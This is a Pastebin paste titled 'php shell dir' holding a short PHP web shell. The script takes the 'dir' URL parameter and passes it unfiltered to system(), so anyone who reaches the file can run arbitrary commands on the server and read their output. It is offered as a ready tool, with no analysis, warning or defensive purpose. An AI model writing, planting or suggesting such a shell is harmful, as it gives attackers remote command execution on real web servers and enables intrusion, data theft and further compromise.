Advertisement
r13y5h4

php shell dir

Dec 25th, 2012
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.15 KB | None | 0 0
  1. <?php
  2. if(isset($_GET['dir']))
  3. {
  4. echo "<body bgcolor=white>
  5. <font color=black size=3>";
  6.     echo '<pre>';system($_GET['dir']);echo '</pre>';
  7. }
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement